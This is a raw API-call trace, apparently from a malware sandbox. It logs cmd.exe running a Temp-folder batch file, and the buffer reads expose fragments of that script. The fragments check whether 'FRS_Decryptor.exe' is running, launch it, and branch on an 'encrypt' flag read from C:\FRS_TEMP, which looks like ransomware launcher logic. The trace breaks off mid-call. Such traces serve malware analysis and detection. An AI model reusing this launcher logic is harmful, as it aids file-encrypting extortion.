[0075.921] GetLastError () returned 0x2 [0075.921] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xd5a130 [0075.921] FindClose (in: hFindFile=0xd5a130 | out: hFindFile=0xd5a130) returned 1 [0075.921] GetConsoleTitleW (in: lpConsoleTitle=0xc8eb3c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0075.921] InitializeProcThreadAttributeList (in: lpAttributeList=0xc8ea68, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xc8ea4c | out: lpAttributeList=0xc8ea68, lpSize=0xc8ea4c) returned 1 [0075.921] UpdateProcThreadAttribute (in: lpAttributeList=0xc8ea68, dwFlags=0x0, Attribute=0x60001, lpValue=0xc8ea54, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xc8ea68, lpPreviousValue=0x0) returned 1 [0075.921] GetStartupInfoW (in: lpStartupInfo=0xc8eaa0 | out: lpStartupInfo=0xc8eaa0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\SYSTEM32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0075.921] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0075.921] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0075.921] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0075.921] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0075.921] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0075.921] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0075.921] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0075.921] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0075.921] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0075.921] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0075.921] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0075.921] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0075.921] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0075.921] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0075.921] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0075.921] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0075.921] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0075.921] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0075.921] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0075.921] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0075.921] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0075.921] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0075.921] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0075.921] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0075.921] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0075.921] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0075.921] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0075.921] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0075.921] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0075.921] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0075.921] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0075.922] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0075.922] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0075.922] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0075.922] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0075.922] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0075.922] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0075.922] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0075.922] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0075.922] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0075.922] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0075.922] lstrcmpW (lpString1="\\PING.EXE", lpString2="\\XCOPY.EXE") returned -1 [0075.922] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\PING.EXE", lpCommandLine="ping -n 3 127.1", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0xc8e9f0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ping -n 3 127.1", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xc8ea3c | out: lpCommandLine="ping -n 3 127.1", lpProcessInformation=0xc8ea3c*(hProcess=0x260, hThread=0x254, dwProcessId=0xb48, dwThreadId=0xb54)) returned 1 [0075.924] CloseHandle (hObject=0x254) returned 1 [0075.924] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0075.924] GetEnvironmentStringsW () returned 0xd2c668* [0075.924] FreeEnvironmentStringsA (penv="=") returned 1 [0075.924] WaitForSingleObject (hHandle=0x260, dwMilliseconds=0xffffffff) returned 0x0 [0077.983] GetExitCodeProcess (in: hProcess=0x260, lpExitCode=0xc8e9d4 | out: lpExitCode=0xc8e9d4*=0x0) returned 1 [0077.983] CloseHandle (hObject=0x260) returned 1 [0077.983] _vsnwprintf (in: _Buffer=0xc8eabc, _BufferCount=0x13, _Format="%08X", _ArgList=0xc8e9dc | out: _Buffer="00000000") returned 8 [0077.983] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0077.983] GetEnvironmentStringsW () returned 0xd30508* [0077.983] FreeEnvironmentStringsA (penv="=") returned 1 [0077.983] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0077.984] GetEnvironmentStringsW () returned 0xd2c668* [0077.984] FreeEnvironmentStringsA (penv="=") returned 1 [0077.984] DeleteProcThreadAttributeList (in: lpAttributeList=0xc8ea68 | out: lpAttributeList=0xc8ea68) [0077.984] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0077.984] _close (_FileHandle=3) returned 0 [0077.984] _get_osfhandle (_FileHandle=1) returned 0x28 [0077.984] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0077.984] _get_osfhandle (_FileHandle=1) returned 0x28 [0077.984] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0077.984] _get_osfhandle (_FileHandle=0) returned 0x24 [0077.984] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0077.984] SetConsoleInputExeNameW () returned 0x1 [0077.984] GetConsoleOutputCP () returned 0x1b5 [0077.985] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0077.985] SetThreadUILanguage (LangId=0x0) returned 0x409 [0077.985] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x34c [0077.985] _open_osfhandle (_OSFileHandle=0x34c, _Flags=8) returned 3 [0077.985] _get_osfhandle (_FileHandle=3) returned 0x34c [0077.985] SetFilePointer (in: hFile=0x34c, lDistanceToMove=2512, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0077.985] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0077.985] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0x9e, lpOverlapped=0x0) returned 1 [0077.985] SetFilePointer (in: hFile=0x34c, lDistanceToMove=2585, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa19 [0077.985] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="for /f \"delims= \" %%i in ('tasklist^|find /i \"FRS_Decryptor.exe\"') do (\r\nl_flag.png\r\np\\FRS.exe\"\r\n") returned 73 [0077.985] GetFileType (hFile=0x34c) returned 0x1 [0077.985] _get_osfhandle (_FileHandle=3) returned 0x34c [0077.985] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa19 [0077.985] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa19 [0077.986] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f02c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f02c*=0x55, lpOverlapped=0x0) returned 1 [0077.986] SetFilePointer (in: hFile=0x34c, lDistanceToMove=2627, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0077.986] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=42, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="if /i \"%%i\"==\"FRS_Decryptor.exe\" goto 4)\r\n/i \"FRS_Decryptor.exe\"') do (\r\nl_flag.png\r\np\\FRS.exe\"\r\n") returned 42 [0077.986] GetFileType (hFile=0x34c) returned 0x1 [0077.986] _get_osfhandle (_FileHandle=3) returned 0x34c [0077.986] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0077.986] _tell (_FileHandle=3) returned 2627 [0077.986] _close (_FileHandle=3) returned 0 [0077.986] _wcsnicmp (_String1="delims= ", _String2="usebackq", _MaxCount=0x8) returned -17 [0077.986] _wcsnicmp (_String1="delims=", _String2="useback", _MaxCount=0x7) returned -17 [0077.986] _wcsnicmp (_String1="deli", _String2="eol=", _MaxCount=0x4) returned -1 [0077.986] _wcsnicmp (_String1="delims=", _String2="delims=", _MaxCount=0x7) returned 0 [0077.986] _wpopen (_Command="tasklist|find /i \"FRS_Decryptor.exe\"", _Mode="rb") returned 0x76ea4c68 [0077.992] feof (_File=0x76ea4c68) returned 0 [0077.992] ferror (_File=0x76ea4c68) returned 0 [0077.992] fgets (in: _Buf=0xd82600, _MaxCount=256, _File=0x76ea4c68 | out: _Buf="FRS_Decryptor.exe 2380 Console 1 3,144 K\r\n", _File=0x76ea4c68) returned="FRS_Decryptor.exe 2380 Console 1 3,144 K\r\n" [0078.490] feof (_File=0x76ea4c68) returned 0 [0078.490] ferror (_File=0x76ea4c68) returned 0 [0078.490] fgets (in: _Buf=0xd86e66, _MaxCount=434, _File=0x76ea4c68 | out: _Buf="", _File=0x76ea4c68) returned 0x0 [0078.535] _pclose (in: _File=0x76ea4c68 | out: _File=0x76ea4c68) returned 0 [0078.536] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0xd43d56, cbMultiByte=78, lpWideCharStr=0xd43d08, cchWideChar=78 | out: lpWideCharStr="FRS_Decryptor.exe 2380 Console 1 3,144 K\r\n") returned 78 [0078.536] lstrcmpiW (lpString1="\"FRS_Decryptor.exe\"", lpString2="\"FRS_Decryptor.exe\"") returned 0 [0078.536] GetConsoleTitleW (in: lpConsoleTitle=0xc8ebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0078.536] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8e900, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0078.536] _open_osfhandle (_OSFileHandle=0x158, _Flags=8) returned 3 [0078.536] _get_osfhandle (_FileHandle=3) returned 0x158 [0078.536] SetFilePointer (in: hFile=0x158, lDistanceToMove=2627, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0078.536] _get_osfhandle (_FileHandle=3) returned 0x158 [0078.536] GetFileSize (in: hFile=0x158, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa6e [0078.536] _wcsnicmp (_String1="4", _String2=":EOF", _MaxCount=0x4) returned -6 [0078.536] _get_osfhandle (_FileHandle=3) returned 0x158 [0078.536] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0078.536] _get_osfhandle (_FileHandle=3) returned 0x158 [0078.536] GetFileType (hFile=0x158) returned 0x1 [0078.536] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0078.536] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x2b, lpOverlapped=0x0) returned 1 [0078.536] SetFilePointer (in: hFile=0x158, lDistanceToMove=2662, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa66 [0078.537] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\FRS_Decryptor.exe\r\n") returned 35 [0078.537] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa66 [0078.537] _get_osfhandle (_FileHandle=3) returned 0x158 [0078.537] GetFileType (hFile=0x158) returned 0x1 [0078.537] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa66 [0078.537] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x8, lpOverlapped=0x0) returned 1 [0078.537] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 4\r\nYFILES%\\FRS_Decryptor.exe\r\n") returned 8 [0078.537] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa6e [0078.537] _get_osfhandle (_FileHandle=3) returned 0x158 [0078.537] GetFileType (hFile=0x158) returned 0x1 [0078.537] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa6e [0078.537] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x0, lpOverlapped=0x0) returned 1 [0078.537] _get_osfhandle (_FileHandle=3) returned 0x158 [0078.537] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.537] _get_osfhandle (_FileHandle=3) returned 0x158 [0078.537] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.537] _get_osfhandle (_FileHandle=3) returned 0x158 [0078.537] GetFileType (hFile=0x158) returned 0x1 [0078.537] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.537] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0078.537] SetFilePointer (in: hFile=0x158, lDistanceToMove=8, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0078.537] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="@shift\r\n") returned 8 [0078.537] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0078.537] _get_osfhandle (_FileHandle=3) returned 0x158 [0078.537] GetFileType (hFile=0x158) returned 0x1 [0078.537] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0078.537] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0078.537] SetFilePointer (in: hFile=0x158, lDistanceToMove=19, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0078.537] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=11, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="@echo off\r\nLES%\\FRS_Decryptor.exe\r\n") returned 11 [0078.537] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0078.537] _get_osfhandle (_FileHandle=3) returned 0x158 [0078.537] GetFileType (hFile=0x158) returned 0x1 [0078.537] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0078.538] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0078.538] SetFilePointer (in: hFile=0x158, lDistanceToMove=21, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0078.538] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\ncho off\r\n") returned 2 [0078.538] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0078.538] _get_osfhandle (_FileHandle=3) returned 0x158 [0078.538] GetFileType (hFile=0x158) returned 0x1 [0078.538] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0078.538] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0078.538] SetFilePointer (in: hFile=0x158, lDistanceToMove=25, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0078.538] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":1\r\no off\r\n") returned 4 [0078.538] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0078.538] _get_osfhandle (_FileHandle=3) returned 0x158 [0078.538] GetFileType (hFile=0x158) returned 0x1 [0078.539] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0078.539] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0078.539] SetFilePointer (in: hFile=0x158, lDistanceToMove=98, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x62 [0078.539] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="for /f \"delims=\" %%i in ('find \"e\" \"C:\\FRS_TEMP\\temp.txt\"')do set n=%%i\r\nl_flag.png\r\n") returned 73 [0078.539] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x62 [0078.539] _get_osfhandle (_FileHandle=3) returned 0x158 [0078.539] GetFileType (hFile=0x158) returned 0x1 [0078.539] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x62 [0078.539] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0078.539] SetFilePointer (in: hFile=0x158, lDistanceToMove=130, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x82 [0078.539] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=32, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="If \\\"%e%\\\"==\\\"encrypt\\\" goto 3\r\ne\" \"C:\\FRS_TEMP\\temp.txt\"')do set n=%%i\r\n") returned 32 [0078.539] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x82 [0078.539] _get_osfhandle (_FileHandle=3) returned 0x158 [0078.539] GetFileType (hFile=0x158) returned 0x1 [0078.539] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x82 [0078.539] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0078.539] SetFilePointer (in: hFile=0x158, lDistanceToMove=135, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x87 [0078.539] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=5, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="cls\r\n%e%\\\"==\\\"encrypt\\\" goto 3\r\n") returned 5 [0078.539] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x87 [0078.539] _get_osfhandle (_FileHandle=3) returned 0x158 [0078.539] GetFileType (hFile=0x158) returned 0x1 [0078.539] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x87 [0078.539] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0078.539] SetFilePointer (in: hFile=0x158, lDistanceToMove=143, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0078.539] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 2\r\n\\\"==\\\"encrypt\\\" goto 3\r\n") returned 8 [0078.539] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0078.539] _get_osfhandle (_FileHandle=3) returned 0x158 [0078.539] GetFileType (hFile=0x158) returned 0x1 [0078.539] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0078.539] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0078.540] SetFilePointer (in: hFile=0x158, 